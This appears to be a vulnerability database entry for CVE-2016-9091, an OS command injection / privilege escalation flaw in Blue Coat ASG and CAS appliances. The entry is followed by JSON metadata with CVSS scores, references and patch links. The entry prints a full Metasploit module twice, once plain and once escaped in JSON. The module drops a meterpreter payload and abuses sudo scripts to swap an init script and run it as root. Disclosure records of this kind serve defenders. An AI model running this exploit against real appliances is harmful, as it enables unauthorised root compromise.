var-201704-0485
Vulnerability from variot

Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges.

Blue Coat Advanced Secure Gateway (ASG) and Content Analysis System (CAS) are products of Blue Coat Systems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Blue Coat products are prone to a command-injection vulnerability because they fail to properly sanitize user-supplied input. This may aid in further attacks.

The following products are affected:

Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable.

Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable.

Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS

Date: April 3, 2017

Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd

Contact: chrisdhebert[at]gmail.com

Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138

Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable

Tested on: BlueCoat CAS 1.3.7.1

CVE : cve-2016-9091

Timeline:

08/31/2016 (Vulnerabilities Discovered)

03/31/2017 (Final Vendor Patch Confirmed)

04/03/2017 (Public Release)

Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerability. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.

Proof of Concept:

Metasploit Module - root priv escalation (via mvtroubleshooting.sh)

This module requires Metasploit: http://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'

class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux

  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end

  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end

    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end

    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"

    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    #Maybe something here to deal with timeouts?? noticed inconsistent..  Exploit failed: Rex::TimeoutError Operation timed out.

  end
end



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0485",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "advanced secure gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "bluecoat",
        "version": "6.6.5.2"
      },
      {
        "model": "content analysis system software",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "bluecoat",
        "version": "1.3.7.3"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "software  6.6.5.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "6.6"
      },
      {
        "model": "content analysis system software",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "1.3"
      },
      {
        "model": "coat advanced secure gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "blue",
        "version": "6.6\u003c6.6.5.4"
      },
      {
        "model": "coat content analysis system",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "blue",
        "version": "1.3\u003c1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bluecoat",
        "version": "6.6.5.2"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bluecoat",
        "version": "1.3.7.3"
      },
      {
        "model": "content analysis system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6"
      },
      {
        "model": "content analysis system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6.5.4"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:advanced_secure_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.6.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:content_analysis_system_software:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.3.7.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Paccione, Chris Hebert, and Corey Boyd.",
    "sources": [
      {
        "db": "BID",
        "id": "97372"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-9091",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-9091",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2017-05236",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-97911",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-9091",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-9091",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-05236",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201704-236",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-97911",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. \nThe following products are affected:\nAdvanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. \nContent Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS\n# Date: April 3, 2017\n# Exploit Authors:  Chris Hebert, Peter Paccione and Corey Boyd\n# Contact: chrisdhebert[at]gmail.com\n# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138\n# Version: CAS 1.3 prior to 1.3.7.4 \u0026 ASG 6.6 prior to 6.6.5.4 are vulnerable\n# Tested on: BlueCoat CAS 1.3.7.1\n# CVE : cve-2016-9091\n \nTimeline:\n--------\n08/31/2016 (Vulnerablities Discovered)\n03/31/2017 (Final Vendor Patch Confirmed)\n04/03/2017 (Public Release)\n \nDescription:\nThe BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. \nA malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. 
\n \nProof of Concept:\n \nMetasploit Module - root priv escalation (via mvtroubleshooting.sh)\n-----------------\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n \nrequire \u0027msf/core\u0027\nrequire \u0027rex\u0027\nrequire \u0027msf/core/exploit/local/linux\u0027\nrequire \u0027msf/core/exploit/exe\u0027\n \n \nclass Metasploit4 \u003c Msf::Exploit::Local\n  Rank = AverageRanking\n \n  include Msf::Exploit::EXE\n  include Msf::Post::File\n  include Msf::Exploit::Local::Linux\n \n  def initialize(info={})\n    super( update_info( info, {\n        \u0027Name\u0027          =\u003e \u0027BlueCoat CAS 1.3.7.1 tomcat-\u003eroot privilege escalation (via mvtroubleshooting.sh)\u0027,\n        \u0027Description\u0027   =\u003e %q{\n          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate\n          privileges. In order to work, a tomcat session with access to sudo on the sudoers\n          is needed. This module is useful for post exploitation of BlueCoat\n          vulnerabilities, where typically web server privileges are acquired, and this\n          user is allowed to execute sudo on the sudoers file. 
\n        },\n        \u0027License\u0027        =\u003e MSF_LICENSE,\n        \u0027Author\u0027       =\u003e [\n         \u0027Chris Hebert \u003cchrisdhebert[at]gmail.com\u003e\u0027,\n         \u0027Pete Paccione \u003cpetepaccione[at]gmail.com\u003e\u0027,\n         \u0027Corey Boyd \u003ccorey.k.boyd[at]gmail.com\u003e\u0027\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u0027Vendor Contacted 8-31-2016\u0027,\n        \u0027References\u0027     =\u003e\n        [\n          [\u0027EDB\u0027, \u0027##TBD##\u0027],\n          [\u0027CVE\u0027, \u00272016-9091\u0027 ],\n          [\u0027URL\u0027, \u0027http://https://bto.bluecoat.com/security-advisory/sa138\u0027]\n        ],\n        \u0027Platform\u0027       =\u003e %w{ linux unix },\n        \u0027Arch\u0027           =\u003e [ ARCH_X86 ],\n        \u0027SessionTypes\u0027   =\u003e [ \u0027shell\u0027, \u0027meterpreter\u0027 ],\n        \u0027Targets\u0027        =\u003e\n          [\n            [ \u0027Linux x86\u0027,       { \u0027Arch\u0027 =\u003e ARCH_X86 } ]\n          ],\n        \u0027DefaultOptions\u0027 =\u003e { \"PrependSetresuid\" =\u003e true, \"WfsDelay\" =\u003e 2 },\n        \u0027DefaultTarget\u0027 =\u003e 0,\n      }\n      ))\n    register_options([\n        OptString.new(\"WritableDir\", [ false, \"A directory where we can write files\", \"/var/log\" ]),\n      ], self.class)\n  end\n \n  def check\n    id=cmd_exec(\"id -un\")\n    if id!=\"tomcat\"\n      print_status(\"#{peer} - ERROR - Session running as id= #{id}, but must be tomcat\")\n      fail_with(Failure::NoAccess, \"Session running as id= #{id}, but must be tomcat\")\n    end\n \n    clprelease=cmd_exec(\"cat /etc/clp-release | cut -d \\\" \\\" -f 3\")\n    if clprelease!=\"1.3.7.1\"\n      print_status(\"#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n      fail_with(Failure::NotVulnerable, \"BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n    end\n \n    return 
Exploit::CheckCode::Vulnerable\n  end\n  def exploit\n    print_status(\"#{peer} - Checking for vulnerable BlueCoat session...\")\n    if check != CheckCode::Vulnerable\n      fail_with(Failure::NotVulnerable, \"FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1\")\n    end\n \n    print_status(\"#{peer} - Running Exploit...\")\n    exe_file = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(3 + rand(5))}.elf\"\n    write_file(exe_file, generate_payload_exe)\n    cmd_exec \"chmod +x #{exe_file}\"\n \n    begin\n      #Backup original nscd init script\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$\n      #Replaces /etc/init.d/nscd script with meterpreter payload\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$\n      #Executes meterpreter payload as root\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh\"\n      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)\n    ensure\n      #Restores original nscd init script\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$\n      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)\n      cmd_exec \"/bin/rm -f #{exe_file}\"\n    end\n    print_status(\"#{peer} - The exploit module has finished\")\n    #Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out. \n \n  end\nend\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-97911",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "97372",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "41785",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "41786",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "41785",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "141909",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-92941",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "id": "VAR-201704-0485",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      }
    ],
    "trust": 0.87514534
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:22:44.941000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SA138",
        "trust": 0.8,
        "url": "https://bto.bluecoat.com/security-advisory/sa138"
      },
      {
        "title": "BluecoatASG6.6/CASOS Command Injection Vulnerability Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/92633"
      },
      {
        "title": "Blue Coat Advanced Secure Gateway  and Content Analysis System Fixes for operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69073"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://bto.bluecoat.com/security-advisory/sa138"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/41785/"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/97372"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/41786/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9091"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9091"
      },
      {
        "trust": 0.3,
        "url": "https://www.bluecoat.com/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "http://https://bto.bluecoat.com/security-advisory/sa138\u0027]"
      },
      {
        "trust": 0.1,
        "url": "http://metasploit.com/download"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
